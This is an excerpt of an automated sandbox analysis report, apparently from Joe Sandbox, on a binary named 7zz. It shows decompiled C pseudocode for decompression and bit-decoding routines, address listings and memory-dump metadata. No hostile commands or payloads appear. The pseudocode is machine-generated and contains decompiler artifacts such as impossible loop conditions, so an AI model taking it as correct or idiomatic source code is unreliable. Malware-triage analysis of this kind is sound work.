													 *(_t444 + 0x1c) = _t259;
												} while (_t435 < _t307);
												goto L45;
											}
											__eflags = _t307;
											if(_t307 > 0) {
												_t357 = _t307;
												_t436 = _t259;
												_t358 = _t357 >> 2;
												memcpy(_t444 + 0x90, _t436, _t358 << 2);
												_t361 = _t357 & 0x00000003;
												__eflags = _t361;
												_t259 = memcpy(_t436 + _t358 + _t358, _t436, _t361);
												_t444 = _t444 + 0x18;
											}
											 *(_t444 + 0x1c) = _t259 + _t307;
											goto L45;
											L50:
											 *(_t444 + 0x78) = 1 << _t307;
											_t332 = _t421 & 0x00000007;
											_t421 = _t421 + _t307;
											_t242 =  *(_t444 + 0x78) - 0x00000001 & 0 << 0x00000008 >> _t332;
											__eflags = _t421 -  *(_t444 + 0x14);
											 *(_t444 + 0x3c) = _t242;
											if(_t421 >  *(_t444 + 0x14)) {
												_t432 = L0040EFA1(_t444 + 0x40);
												 *(_t444 + 0xac) = 0x12;
												L0040EEB2(_t444 + 0x40);
												_t245 =  *(_t444 + 0x54);
												 *(_t444 + 0xac) = 0;
												__eflags = _t245;
												if(_t245 != 0) {
													 *((intOrPtr*)( *_t245 + 8))(_t245);
												}
												 *(_t444 + 0xac) = 0x13;
												goto L74;
											}
											__eflags = _t242 -  *(_t444 + 0x18);
											if(_t242 >=  *(_t444 + 0x18)) {
												 *(_t444 + 0xac) = 0x10;
												L0040EEB2(_t444 + 0x40);
												_t251 =  *(_t444 + 0x54);
												 *(_t444 + 0xac) = 0;
												__eflags = _t251;
												if(_t251 != 0) {
													 *((intOrPtr*)( *_t251 + 8))(_t251);
												}
												 *(_t444 + 0xac) = 0x11;
												E0040DFD3(_t444 + 0x1c);
												_t227 =  *(_t444 + 0x28);
												 *(_t444 + 0xac) = 0xffffffff;
												__eflags = _t227;
												if(_t227 == 0) {
													goto L85;
												} else {
													goto L84;
												}
											}
											__eflags =  *(_t444 + 0x13);
											if( *(_t444 + 0x13) == 0) {
												L56:
												_t254 =  *(_t444 + 0x3c);
												_t433 = 0;
												__eflags = _t254 - 0x100;
												if(_t254 < 0x100) {
													L58:
													 *(_t433 +  *(_t441 + 0x14)) = _t254;
													_t434 = _t433 + 1;
													__eflags =  *(_t444 + 0x12);
													if( *(_t444 + 0x12) != 0) {
														_t366 =  *(_t444 + 0x18);
														 *(_t366 +  *((intOrPtr*)(_t441 + 0x10)) - 1) = _t254;
														__eflags =  *(_t444 + 0x3c) - _t366 - 1;
														if( *(_t444 + 0x3c) == _t366 - 1) {
															 *( *(_t441 + 0x14)) = _t254;
														}
													}
													do {
														_t434 = _t434 - 1;
														 *((char*)( *((intOrPtr*)(_t444 + 0x44)) +  *((intOrPtr*)(_t444 + 0x40)))) =  *((intOrPtr*)( *(_t441 + 0x14) + _t434));
														_t257 =  *((intOrPtr*)(_t444 + 0x44)) + 1;
														__eflags = _t257 -  *((intOrPtr*)(_t444 + 0x48));
														 *((intOrPtr*)(_t444 + 0x44)) = _t257;
														if(__eflags == 0) {
															L0040EFBD(_t444 + 0x40, __eflags);
														}
														__eflags = _t434;
													} while (_t434 > 0);
													_t258 =  *(_t444 + 0x18);
													__eflags = _t258 -  *(_t444 + 0x70);
													if(_t258 >=  *(_t444 + 0x70)) {
														L55:
														 *(_t444 + 0x12) = 0;
														while(1) {
															__eflags =  *(_t444 + 0x14) - _t421;
															if( *(_t444 + 0x14) != _t421) {
																goto L50;
															}
															goto L36;
														}
													}
													 *(_t444 + 0x12) = 1;
													 *((short*)( *((intOrPtr*)(_t441 + 0xc)) + _t258 * 2)) =  *(_t444 + 0x3c);
													_t272 = _t258 + 1;
													__eflags = _t272 -  *(_t444 + 0x78);
													 *(_t444 + 0x18) = _t272;
													if(_t272 >  *(_t444 + 0x78)) {
														__eflags = _t307 -  *(_t444 + 0x74);
														if(_t307 <  *(_t444 + 0x74)) {
															_t421 = 0;
															_t307 = _t307 + 1;
															 *(_t444 + 0x14) = 0;
														}
													}
													continue;
												} else {
													goto L57;
												}
												do {
													L57:
													_t433 = _t433 + 1;
													 *((char*)(_t433 +  *(_t441 + 0x14) - 1)) =  *((intOrPtr*)(_t254 +  *((intOrPtr*)(_t441 + 0x10))));
													_t254 = 0;
													__eflags = 0 - 0x100;
												} while (0 >= 0x100);
												goto L58;
											}
											__eflags = _t242 - 0x100;
											if(_t242 != 0x100) {
												goto L56;
											}
											_t421 = 0;
											__eflags = 0;
											_t307 = 9;
											 *(_t444 + 0x14) = 0;
											 *(_t444 + 0x18) = 0x101;
											goto L55;
										}
									}
									 *(_t444 + 0xac) = 0xc;
									L0040EEB2(_t444 + 0x40);
									_t275 =  *(_t444 + 0x54);
									 *(_t444 + 0xac) = 0;
									__eflags = _t275 - _t421;
									if(_t275 != _t421) {
										 *((intOrPtr*)( *_t275 + 8))(_t275);
									}
									 *(_t444 + 0xac) = 0xd;
									E0040DFD3(_t444 + 0x1c);
									_t277 =  *(_t444 + 0x28);
									 *(_t444 + 0xac) = 0xffffffff;
									__eflags = _t277 - _t421;
									if(_t277 != _t421) {
										 *((intOrPtr*)( *_t277 + 8))(_t277);
									}
									L32:
									_t228 = 0x8007000e;
									goto L86;
								}
								 *(_t444 + 0xac) = 0xa;
								L0040EEB2(_t444 + 0x40);
								_t281 =  *(_t444 + 0x54);
								 *(_t444 + 0xac) = 0;
								__eflags = _t281 - _t421;
								if(_t281 != _t421) {
									 *((intOrPtr*)( *_t281 + 8))(_t281);
								}
								 *(_t444 + 0xac) = 0xb;
								E0040DFD3(_t444 + 0x1c);
								_t283 =  *(_t444 + 0x28);
								 *(_t444 + 0xac) = 0xffffffff;
								__eflags = _t283 - _t421;
								if(_t283 == _t421) {
									goto L32;
								} else {
									 *((intOrPtr*)( *_t283 + 8))(_t283);
									_t228 = 0x8007000e;
									goto L86;
								}
							}
							 *(_t444 + 0xac) = 8;
							L0040EEB2(_t444 + 0x40);
							_t287 =  *(_t444 + 0x54);
							 *(_t444 + 0xac) = 0;
							__eflags = _t287 - _t421;
							if(_t287 != _t421) {
								 *((intOrPtr*)( *_t287 + 8))(_t287);
							}
							 *(_t444 + 0xac) = 9;
							E0040DFD3(_t444 + 0x1c);
							_t289 =  *(_t444 + 0x28);
							 *(_t444 + 0xac) = 0xffffffff;
							__eflags = _t289 - _t421;
							if(_t289 == _t421) {
								goto L32;
							} else {
								 *((intOrPtr*)( *_t289 + 8))(_t289);
								_t228 = 0x8007000e;
								goto L86;
							}
						}
						__eflags =  *(__ecx + 0xc);
						if( *(__ecx + 0xc) == 0) {
							goto L17;
						}
						__eflags =  *(__ecx + 0x10);
						if( *(__ecx + 0x10) == 0) {
							goto L17;
						}
						__eflags =  *(__ecx + 0x14);
						if( *(__ecx + 0x14) != 0) {
							goto L34;
						}
						goto L17;
					} else {
						 *(_t444 + 0xac) = 4;
						L0040EEB2(_t444 + 0x40);
						_t293 =  *(_t444 + 0x54);
						 *(_t444 + 0xac) = 0;
						__eflags = _t293;
						if(_t293 != 0) {
							 *((intOrPtr*)( *_t293 + 8))(_t293);
						}
						 *(_t444 + 0xac) = 5;
						E0040DFD3(_t444 + 0x1c);
						_t295 =  *(_t444 + 0x28);
						 *(_t444 + 0xac) = 0xffffffff;
						__eflags = _t295 - _t421;
						if(_t295 != _t421) {
							 *((intOrPtr*)( *_t295 + 8))(_t295);
						}
						goto L10;
					}
				} else {
					 *(_t444 + 0xac) = 2;
					L0040EEB2(_t444 + 0x40);
					_t299 =  *(_t444 + 0x54);
					 *(_t444 + 0xac) = 0;
					if(_t299 != 0) {
						 *((intOrPtr*)( *_t299 + 8))(_t299);
					}
					 *(_t444 + 0xac) = 3;
					E0040DFD3(_t444 + 0x1c);
					_t301 =  *(_t444 + 0x28);
					 *(_t444 + 0xac) = 0xffffffff;
					if(_t301 == _t421) {
						L10:
						_t228 = 0x8007000e;
						goto L86;
					} else {
						 *((intOrPtr*)( *_t301 + 8))(_t301);
						_t228 = 0x8007000e;
						L86:
						 *[fs:0x0] =  *((intOrPtr*)(_t444 + 0xa4));
						return _t228;
					}
				}
			}

























































                                                                                                                                    0x00454b10
                                                                                                                                    0x00454b12
                                                                                                                                    0x00454b1d
                                                                                                                                    0x00454b1e
                                                                                                                                    0x00454b25
                                                                                                                                    0x00454b2d
                                                                                                                                    0x00454b35
                                                                                                                                    0x00454b3a
                                                                                                                                    0x00454b3c
                                                                                                                                    0x00454b43
                                                                                                                                    0x00454b47
                                                                                                                                    0x00454b4b
                                                                                                                                    0x00454b4f
                                                                                                                                    0x00454b5c
                                                                                                                                    0x00454b6b
                                                                                                                                    0x00454bdb
                                                                                                                                    0x00454be4
                                                                                                                                    0x00454bf2
                                                                                                                                    0x00454bf7
                                                                                                                                    0x00454bf9
                                                                                                                                    0x00454c65
                                                                                                                                    0x00454c6e
                                                                                                                                    0x00454c73
                                                                                                                                    0x00454c78
                                                                                                                                    0x00454c7b
                                                                                                                                    0x00454c7d
                                                                                                                                    0x00454c80
                                                                                                                                    0x00454c84
                                                                                                                                    0x0045519c
                                                                                                                                    0x004551a0
                                                                                                                                    0x004551a8
                                                                                                                                    0x004551ad
                                                                                                                                    0x004551b1
                                                                                                                                    0x004551b9
                                                                                                                                    0x004551bb
                                                                                                                                    0x004551c0
                                                                                                                                    0x004551c0
                                                                                                                                    0x004551c7
                                                                                                                                    0x004551d2
                                                                                                                                    0x004551d7
                                                                                                                                    0x004551db
                                                                                                                                    0x004551e6
                                                                                                                                    0x004551e8
                                                                                                                                    0x004551f0
                                                                                                                                    0x004551f0
                                                                                                                                    0x00000000
                                                                                                                                    0x004551ea
                                                                                                                                    0x004551ea
                                                                                                                                    0x004551ed
                                                                                                                                    0x00000000
                                                                                                                                    0x004551ed
                                                                                                                                    0x004551e8
                                                                                                                                    0x00454c8a
                                                                                                                                    0x00454c8d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454c9b
                                                                                                                                    0x00454c9d
                                                                                                                                    0x00454ca4
                                                                                                                                    0x00454ca6
                                                                                                                                    0x00454caa
                                                                                                                                    0x00454cbf
                                                                                                                                    0x00454cc1
                                                                                                                                    0x00454cc9
                                                                                                                                    0x00454cce
                                                                                                                                    0x00454cd0
                                                                                                                                    0x00454cd3
                                                                                                                                    0x00454d39
                                                                                                                                    0x00454d3e
                                                                                                                                    0x00454d40
                                                                                                                                    0x00454d43
                                                                                                                                    0x00454da5
                                                                                                                                    0x00454daa
                                                                                                                                    0x00454dac
                                                                                                                                    0x00454daf
                                                                                                                                    0x00454e0f
                                                                                                                                    0x00454e12
                                                                                                                                    0x00454e1b
                                                                                                                                    0x00454e1f
                                                                                                                                    0x00454e24
                                                                                                                                    0x00454e2e
                                                                                                                                    0x00454e2e
                                                                                                                                    0x00454e34
                                                                                                                                    0x00454e38
                                                                                                                                    0x00454e3d
                                                                                                                                    0x00454e41
                                                                                                                                    0x00454e46
                                                                                                                                    0x00454e4a
                                                                                                                                    0x00454e51
                                                                                                                                    0x00454e51
                                                                                                                                    0x00454e55
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454e5b
                                                                                                                                    0x00454e5f
                                                                                                                                    0x00454e65
                                                                                                                                    0x00454e67
                                                                                                                                    0x00454e8e
                                                                                                                                    0x00454e90
                                                                                                                                    0x00454e92
                                                                                                                                    0x00454ebe
                                                                                                                                    0x00454ebe
                                                                                                                                    0x00454ec0
                                                                                                                                    0x00454ec0
                                                                                                                                    0x00454ecb
                                                                                                                                    0x00454ecf
                                                                                                                                    0x00454ed1
                                                                                                                                    0x00454edd
                                                                                                                                    0x00454ee4
                                                                                                                                    0x00454ee6
                                                                                                                                    0x00454eed
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454ef5
                                                                                                                                    0x00454ef5
                                                                                                                                    0x00454ef9
                                                                                                                                    0x00454efd
                                                                                                                                    0x00454f01
                                                                                                                                    0x00454f0b
                                                                                                                                    0x00454f13
                                                                                                                                    0x00454f21
                                                                                                                                    0x00454f25
                                                                                                                                    0x00454f28
                                                                                                                                    0x00454f2a
                                                                                                                                    0x00454f31
                                                                                                                                    0x00454f38
                                                                                                                                    0x00454f55
                                                                                                                                    0x00454f57
                                                                                                                                    0x00454f59
                                                                                                                                    0x004550b6
                                                                                                                                    0x004550be
                                                                                                                                    0x004550c3
                                                                                                                                    0x004550c7
                                                                                                                                    0x004550cf
                                                                                                                                    0x004550d1
                                                                                                                                    0x004550d6
                                                                                                                                    0x004550d6
                                                                                                                                    0x004550d9
                                                                                                                                    0x00455123
                                                                                                                                    0x00455127
                                                                                                                                    0x0045512c
                                                                                                                                    0x00455130
                                                                                                                                    0x0045513b
                                                                                                                                    0x0045513d
                                                                                                                                    0x00455142
                                                                                                                                    0x00455142
                                                                                                                                    0x00455145
                                                                                                                                    0x00000000
                                                                                                                                    0x00455145
                                                                                                                                    0x00000000
                                                                                                                                    0x00454f59
                                                                                                                                    0x00454f03
                                                                                                                                    0x00454f09
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454e94
                                                                                                                                    0x00454e94
                                                                                                                                    0x00454e94
                                                                                                                                    0x00454e98
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454e9e
                                                                                                                                    0x00454ea3
                                                                                                                                    0x00454ea5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454ea7
                                                                                                                                    0x00454eab
                                                                                                                                    0x00454eab
                                                                                                                                    0x00454ead
                                                                                                                                    0x00454eae
                                                                                                                                    0x00454eb5
                                                                                                                                    0x00454eb6
                                                                                                                                    0x00454eb8
                                                                                                                                    0x00454eb8
                                                                                                                                    0x00000000
                                                                                                                                    0x00454e94
                                                                                                                                    0x00454e69
                                                                                                                                    0x00454e6b
                                                                                                                                    0x00454e6d
                                                                                                                                    0x00454e6f
                                                                                                                                    0x00454e7a
                                                                                                                                    0x00454e7d
                                                                                                                                    0x00454e81
                                                                                                                                    0x00454e81
                                                                                                                                    0x00454e84
                                                                                                                                    0x00454e84
                                                                                                                                    0x00454e84
                                                                                                                                    0x00454e88
                                                                                                                                    0x00000000
                                                                                                                                    0x00454f5f
                                                                                                                                    0x00454f76
                                                                                                                                    0x00454f95
                                                                                                                                    0x00454f98
                                                                                                                                    0x00454fa1
                                                                                                                                    0x00454fa3
                                                                                                                                    0x00454fa5
                                                                                                                                    0x00454fa9
                                                                                                                                    0x004550ef
                                                                                                                                    0x004550f5
                                                                                                                                    0x004550fd
                                                                                                                                    0x00455102
                                                                                                                                    0x00455106
                                                                                                                                    0x0045510e
                                                                                                                                    0x00455110
                                                                                                                                    0x00455115
                                                                                                                                    0x00455115
                                                                                                                                    0x00455118
                                                                                                                                    0x00000000
                                                                                                                                    0x00455118
                                                                                                                                    0x00454faf
                                                                                                                                    0x00454fb3
                                                                                                                                    0x00455150
                                                                                                                                    0x00455158
                                                                                                                                    0x0045515d
                                                                                                                                    0x00455161
                                                                                                                                    0x00455169
                                                                                                                                    0x0045516b
                                                                                                                                    0x00455170
                                                                                                                                    0x00455170
                                                                                                                                    0x00455177
                                                                                                                                    0x00455182
                                                                                                                                    0x00455187
                                                                                                                                    0x0045518b
                                                                                                                                    0x00455196
                                                                                                                                    0x00455198
                                                                                                                                    0x00000000
                                                                                                                                    0x0045519a
                                                                                                                                    0x00000000
                                                                                                                                    0x0045519a
                                                                                                                                    0x00455198
                                                                                                                                    0x00454fbd
                                                                                                                                    0x00454fbf
                                                                                                                                    0x00454fe5
                                                                                                                                    0x00454fe5
                                                                                                                                    0x00454fe9
                                                                                                                                    0x00454feb
                                                                                                                                    0x00454ff0
                                                                                                                                    0x00455012
                                                                                                                                    0x00455019
                                                                                                                                    0x0045501c
                                                                                                                                    0x0045501d
                                                                                                                                    0x0045501f
                                                                                                                                    0x00455024
                                                                                                                                    0x00455028
                                                                                                                                    0x00455031
                                                                                                                                    0x00455033
                                                                                                                                    0x00455038
                                                                                                                                    0x00455038
                                                                                                                                    0x00455033
                                                                                                                                    0x0045503a
                                                                                                                                    0x00455041
                                                                                                                                    0x00455049
                                                                                                                                    0x00455054
                                                                                                                                    0x00455055
                                                                                                                                    0x00455057
                                                                                                                                    0x0045505b
                                                                                                                                    0x00455061
                                                                                                                                    0x00455061
                                                                                                                                    0x00455066
                                                                                                                                    0x00455066
                                                                                                                                    0x0045506a
                                                                                                                                    0x00455072
                                                                                                                                    0x00455074
                                                                                                                                    0x00454fdb
                                                                                                                                    0x00454fdb
                                                                                                                                    0x00454e51
                                                                                                                                    0x00454e51
                                                                                                                                    0x00454e55
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454e55
                                                                                                                                    0x00454e51
                                                                                                                                    0x00455082
                                                                                                                                    0x00455087
                                                                                                                                    0x0045508f
                                                                                                                                    0x00455090
                                                                                                                                    0x00455092
                                                                                                                                    0x00455096
                                                                                                                                    0x0045509c
                                                                                                                                    0x004550a0
                                                                                                                                    0x004550a6
                                                                                                                                    0x004550a8
                                                                                                                                    0x004550a9
                                                                                                                                    0x004550a9
                                                                                                                                    0x004550a0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454ff2
                                                                                                                                    0x00454ff2
                                                                                                                                    0x00454ff8
                                                                                                                                    0x00454ffc
                                                                                                                                    0x00455009
                                                                                                                                    0x0045500b
                                                                                                                                    0x0045500b
                                                                                                                                    0x00000000
                                                                                                                                    0x00454ff2
                                                                                                                                    0x00454fc1
                                                                                                                                    0x00454fc6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454fc8
                                                                                                                                    0x00454fc8
                                                                                                                                    0x00454fca
                                                                                                                                    0x00454fcf
                                                                                                                                    0x00454fd3
                                                                                                                                    0x00000000
                                                                                                                                    0x00454fd3
                                                                                                                                    0x00454e51
                                                                                                                                    0x00454db5
                                                                                                                                    0x00454dbd
                                                                                                                                    0x00454dc2
                                                                                                                                    0x00454dc6
                                                                                                                                    0x00454dce
                                                                                                                                    0x00454dd0
                                                                                                                                    0x00454dd5
                                                                                                                                    0x00454dd5
                                                                                                                                    0x00454ddc
                                                                                                                                    0x00454de7
                                                                                                                                    0x00454dec
                                                                                                                                    0x00454df0
                                                                                                                                    0x00454dfb
                                                                                                                                    0x00454dfd
                                                                                                                                    0x00454e02
                                                                                                                                    0x00454e02
                                                                                                                                    0x00454e05
                                                                                                                                    0x00454e05
                                                                                                                                    0x00000000
                                                                                                                                    0x00454e05
                                                                                                                                    0x00454d49
                                                                                                                                    0x00454d51
                                                                                                                                    0x00454d56
                                                                                                                                    0x00454d5a
                                                                                                                                    0x00454d62
                                                                                                                                    0x00454d64
                                                                                                                                    0x00454d69
                                                                                                                                    0x00454d69
                                                                                                                                    0x00454d70
                                                                                                                                    0x00454d7b
                                                                                                                                    0x00454d80
                                                                                                                                    0x00454d84
                                                                                                                                    0x00454d8f
                                                                                                                                    0x00454d91
                                                                                                                                    0x00000000
                                                                                                                                    0x00454d93
                                                                                                                                    0x00454d96
                                                                                                                                    0x00454d99
                                                                                                                                    0x00000000
                                                                                                                                    0x00454d99
                                                                                                                                    0x00454d91
                                                                                                                                    0x00454cd9
                                                                                                                                    0x00454ce1
                                                                                                                                    0x00454ce6
                                                                                                                                    0x00454cea
                                                                                                                                    0x00454cf2
                                                                                                                                    0x00454cf4
                                                                                                                                    0x00454cf9
                                                                                                                                    0x00454cf9
                                                                                                                                    0x00454d00
                                                                                                                                    0x00454d0b
                                                                                                                                    0x00454d10
                                                                                                                                    0x00454d14
                                                                                                                                    0x00454d1f
                                                                                                                                    0x00454d21
                                                                                                                                    0x00000000
                                                                                                                                    0x00454d27
                                                                                                                                    0x00454d2a
                                                                                                                                    0x00454d2d
                                                                                                                                    0x00000000
                                                                                                                                    0x00454d2d
                                                                                                                                    0x00454d21
                                                                                                                                    0x00454cac
                                                                                                                                    0x00454caf
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454cb1
                                                                                                                                    0x00454cb4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454cb6
                                                                                                                                    0x00454cb9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00454bfb
                                                                                                                                    0x00454bff
                                                                                                                                    0x00454c07
                                                                                                                                    0x00454c0c
                                                                                                                                    0x00454c10
                                                                                                                                    0x00454c18
                                                                                                                                    0x00454c1a
                                                                                                                                    0x00454c1f
                                                                                                                                    0x00454c1f
                                                                                                                                    0x00454c26
                                                                                                                                    0x00454c31
                                                                                                                                    0x00454c36
                                                                                                                                    0x00454c3a
                                                                                                                                    0x00454c45
                                                                                                                                    0x00454c47
                                                                                                                                    0x00454c4c
                                                                                                                                    0x00454c4c
                                                                                                                                    0x00000000
                                                                                                                                    0x00454c47
                                                                                                                                    0x00454b6d
                                                                                                                                    0x00454b71
                                                                                                                                    0x00454b79
                                                                                                                                    0x00454b7e
                                                                                                                                    0x00454b82
                                                                                                                                    0x00454b8c
                                                                                                                                    0x00454b91
                                                                                                                                    0x00454b91
                                                                                                                                    0x00454b98
                                                                                                                                    0x00454ba3
                                                                                                                                    0x00454ba8
                                                                                                                                    0x00454bac
                                                                                                                                    0x00454bb9
                                                                                                                                    0x00454c4f
                                                                                                                                    0x00454c4f
                                                                                                                                    0x00000000
                                                                                                                                    0x00454bbf
                                                                                                                                    0x00454bc2
                                                                                                                                    0x00454bc5
                                                                                                                                    0x004551f5
                                                                                                                                    0x00455200
                                                                                                                                    0x0045520d
                                                                                                                                    0x0045520d
                                                                                                                                    0x00454bb9

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9c3b520574d05f56df56403af9e8bc413c423cf886d632776319decb9a179020
                                                                                                                                    • Instruction ID: 6ebc25fde0dfe73e998ef2a13e85b2c570cd5fc6f02970fa413b5811a577ba22
                                                                                                                                    • Opcode Fuzzy Hash: 9c3b520574d05f56df56403af9e8bc413c423cf886d632776319decb9a179020
                                                                                                                                    • Instruction Fuzzy Hash: FE126C306083818FD724CF29C454BAFBBE1AFD5308F14891EE8D987392DA789849CB57
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0044A7E0 Relevance: .5, Instructions: 453COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E0044A7E0(void* __ecx) {
				void* __edi;
				intOrPtr _t172;
				signed int _t174;
				unsigned int _t182;
				signed int _t185;
				signed char _t186;
				void* _t187;
				signed int _t193;
				signed int _t198;
				signed int _t201;
				signed int _t208;
				signed int _t209;
				signed int _t211;
				intOrPtr _t216;
				signed int _t218;
				signed int _t220;
				intOrPtr _t225;
				signed int _t227;
				signed int _t230;
				signed char _t232;
				signed char _t236;
				signed int _t240;
				signed int _t244;
				signed int _t249;
				intOrPtr _t258;
				intOrPtr _t263;
				signed int _t267;
				signed int _t268;
				signed int _t274;
				intOrPtr* _t280;
				intOrPtr _t285;
				signed int _t288;
				void* _t289;
				intOrPtr* _t292;
				signed int _t305;
				void* _t310;
				signed int _t321;
				void* _t342;
				intOrPtr* _t345;
				signed int _t351;
				signed int _t356;
				unsigned int _t357;
				signed int _t359;
				signed int _t362;
				intOrPtr _t367;
				intOrPtr _t370;
				intOrPtr _t375;
				void* _t378;
				unsigned int _t379;
				intOrPtr* _t380;
				intOrPtr _t383;
				signed int _t385;
				intOrPtr* _t386;
				intOrPtr _t388;
				intOrPtr _t391;
				intOrPtr _t394;
				signed int _t395;
				signed int _t396;
				intOrPtr _t401;
				void* _t402;

				_t378 = __ecx;
				_t172 =  *((intOrPtr*)(__ecx + 0xd54));
				if(_t172 == 0xffffffff) {
					L82:
					__eflags = 0;
					return 0;
				} else {
					_t379 = 0;
					if(_t172 != 0xfffffffe) {
						L9:
						_t395 =  *(_t402 + 0x28);
						__eflags = _t395 - _t379;
						if(_t395 == _t379) {
							goto L82;
						} else {
							_t174 =  *(_t378 + 0xd54);
							__eflags = _t174 - _t379;
							if(_t174 <= _t379) {
								L18:
								__eflags = _t395 - _t379;
								if(_t395 <= _t379) {
									goto L82;
								} else {
									while(1) {
										__eflags =  *(_t378 + 0xd5c);
										if( *(_t378 + 0xd5c) == 0) {
											goto L23;
										}
										__eflags =  *(_t378 + 0xd48);
										if(__eflags != 0) {
											 *(_t378 + 0xd54) = 0xffffffff;
											__eflags = 0;
											return 0;
										} else {
											_t240 = E0044A440(_t378, __eflags);
											__eflags = _t240;
											if(_t240 == 0) {
												L80:
												return 1;
											} else {
												 *(_t378 + 0xd5c) = 0;
												goto L23;
											}
										}
										goto L83;
										L23:
										__eflags =  *(_t378 + 0xd49);
										if( *(_t378 + 0xd49) == 0) {
											while(1) {
												__eflags =  *(_t378 + 0x68) - 4;
												if( *(_t378 + 0x68) > 4) {
													goto L80;
												}
												_t380 = _t378 + 0x40;
												L0041F43D(_t380);
												_t258 =  *_t380;
												_t182 =  *(_t380 + 4) >> 0x00000008 - _t258 >> 0x00000009 & 0x00007fff;
												__eflags = _t182 -  *((intOrPtr*)(_t378 + 0x9c));
												if(_t182 >=  *((intOrPtr*)(_t378 + 0x9c))) {
													__eflags = _t182 -  *((intOrPtr*)(_t378 + 0xa0));
													_t280 = _t378 + 0xa0;
													_t351 = 0xa;
													if(_t182 >=  *((intOrPtr*)(_t378 + 0xa0))) {
														do {
															_t280 = _t280 + 4;
															_t351 = _t351 + 1;
															__eflags = _t182 -  *_t280;
														} while (_t182 >=  *_t280);
													}
												} else {
													_t351 =  *((intOrPtr*)((_t182 >> 6) + _t378 + 0x578));
												}
												 *_t380 = _t258 + _t351;
												 *(_t380 + 0x30) =  *(_t380 + 0x30) >> _t351;
												_t185 = (_t182 -  *((intOrPtr*)(_t378 + 0x74 + _t351 * 4)) >> 0xf - _t351) +  *((intOrPtr*)(_t378 + 0xb8 + _t351 * 4));
												__eflags = _t185 - 0x120;
												if(_t185 >= 0x120) {
													goto L80;
												} else {
													_t186 =  *(_t378 + 0xf8 + _t185 * 4);
													__eflags = _t186 - 0x100;
													if(__eflags >= 0) {
														if(__eflags == 0) {
															 *(_t378 + 0xd5c) = 1;
															goto L77;
														} else {
															__eflags = _t186 - 0x11e;
															if(_t186 >= 0x11e) {
																goto L80;
															} else {
																_t187 = _t186 - 0x101;
																__eflags =  *(_t378 + 0xd51);
																if( *(_t378 + 0xd51) == 0) {
																	__eflags = 0;
																	_t356 =  *((intOrPtr*)(_t187 + 0x47bfc0));
																	 *(_t402 + 0x10) = 0;
																} else {
																	_t356 =  *((intOrPtr*)(_t187 + 0x47bfe0));
																	 *(_t402 + 0x10) = 0;
																}
																_t396 = _t356;
																__eflags =  *_t380 - 8;
																if( *_t380 >= 8) {
																	do {
																		 *(_t402 + 0x18) = 0;
																		_t220 = L0044AD80(_t380 + 8, _t402 + 0x14);
																		__eflags = _t220;
																		if(_t220 == 0) {
																			 *(_t402 + 0x14) = 0xff;
																			_t227 =  *(_t380 + 0x28) + 1;
																			__eflags = _t227;
																			 *(_t380 + 0x28) = _t227;
																		}
																		_t370 =  *_t380;
																		 *(_t380 + 0x30) =  *(_t380 + 0x30) | ( *(_t402 + 0x14) & 0x000000ff) << 0x00000020 - _t370;
																		_t225 = _t370 - 8;
																		__eflags = _t225 - 8;
																		 *(_t380 + 4) =  *(_t380 + 4) << 8;
																		 *_t380 = _t225;
																	} while (_t225 >= 8);
																}
																_t357 =  *(_t380 + 0x30);
																 *_t380 =  *_t380 + _t396;
																_t112 = ((0x00000001 << _t396) - 0x00000001 & _t357) + 3; // 0x40003
																_t193 =  *(_t402 + 0x10) + _t112;
																_t305 =  *(_t402 + 0x28);
																__eflags = _t193 - _t305;
																 *(_t380 + 0x30) = _t357 >> _t396;
																 *(_t402 + 0x10) = _t193;
																 *(_t402 + 0x1c) = _t193;
																if(_t193 > _t305) {
																	 *(_t402 + 0x1c) = _t305;
																}
																L0041F43D(_t380);
																_t263 =  *_t380;
																_t198 =  *(_t380 + 4) >> 0x00000008 - _t263 >> 0x00000009 & 0x00007fff;
